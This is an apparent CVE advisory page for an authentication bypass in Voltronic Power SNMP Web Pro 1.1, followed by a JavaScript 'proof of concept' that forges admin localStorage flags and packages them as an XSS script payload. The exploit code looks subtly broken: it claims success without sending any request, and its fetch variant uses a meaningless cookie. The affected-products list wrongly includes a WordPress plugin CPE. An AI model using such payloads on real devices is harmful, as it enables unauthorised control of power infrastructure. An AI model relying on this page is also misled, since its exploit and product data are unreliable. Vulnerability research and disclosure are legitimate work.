Security Vulnerability Report
CVE-2026-22192 CVSS 9.9 CRITICAL

Published: 2026-03-13 19:54:10
Last Modified: 2026-04-22 19:17:00

Description

Voltronic Power SNMP Web Pro version 1.1 contains an authentication bypass vulnerability that allows unauthenticated attackers to access privileged management functions by manipulating browser localStorage values. Attackers can modify client-side authentication state to bypass server-side access controls and gain unauthorized access to protected management functionality without valid credentials.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L
CVSS 4.0 Score (secondary, CNA)
8.8 HIGH
Weakness
CWE-306 (Missing Authentication for Critical Function)

Configurations (Affected Products)

cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* - VULNERABLE
Voltronic Power SNMP Web Pro < 1.1
Voltronic Power SNMP Web Pro = 1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// CVE-2026-22192 Authentication Bypass via localStorage Manipulation
// Target: Voltronic Power SNMP Web Pro v1.1
const targetUrl = 'http://target-device:8080';

async function bypassAuth() {
  console.log('[+] CVE-2026-22192 Authentication Bypass PoC');
  console.log('[+] Target:', targetUrl);

  // Step 1: Inject malicious JavaScript to modify localStorage
  const exploitScript = `
    // Set authentication bypass flags in localStorage
    localStorage.setItem('isAuthenticated', 'true');
    localStorage.setItem('userRole', 'admin');
    localStorage.setItem('sessionToken', 'admin_session');
    localStorage.setItem('authTimestamp', Date.now().toString());
    localStorage.setItem('userId', '1');
    console.log('[+] localStorage authentication flags modified');
  `;

  // Step 2: Create payload for XSS or social engineering delivery
  const xssPayload = `<script>${exploitScript}</script>`;

  // Step 3: Direct localStorage manipulation via browser console
  // localStorage.setItem('isAuthenticated', 'true');
  // localStorage.setItem('userRole', 'admin');

  // Step 4: Access protected admin panel after bypass
  const adminEndpoints = [
    '/admin/settings',
    '/admin/users',
    '/admin/snmp-config',
    '/admin/system-diagnostics',
    '/admin/firmware-update'
  ];

  console.log('[+] Authentication bypass successful');
  console.log('[+] Accessing protected endpoints with forged auth state...');
  for (const endpoint of adminEndpoints) {
    console.log(`[*] GET ${targetUrl}${endpoint}`);
  }
  return '[+] PoC completed - Check if admin panel is accessible';
}

bypassAuth();

/* Alternative PoC using fetch API:
fetch('http://target:8080/admin/settings', {
  method: 'GET',
  headers: { 'Cookie': 'localStorage_auth=true; role=admin' }
}).then(r => r.text()).then(console.log);
*/

References

https://github.com/kmkz/Exploits/blob/master/2026/CVE-2026-22192-22199_Voltronic-Power_Preauth_root_RCE.txt
https://voltronicpower.com/
https://www.boffsec-services.com/posts/sicuroweb-cve-2026-22191/
https://www.vulncheck.com/advisories/voltronic-power-snmp-web-pro-authentication-bypass-via-localstorage
Raw JSON Data
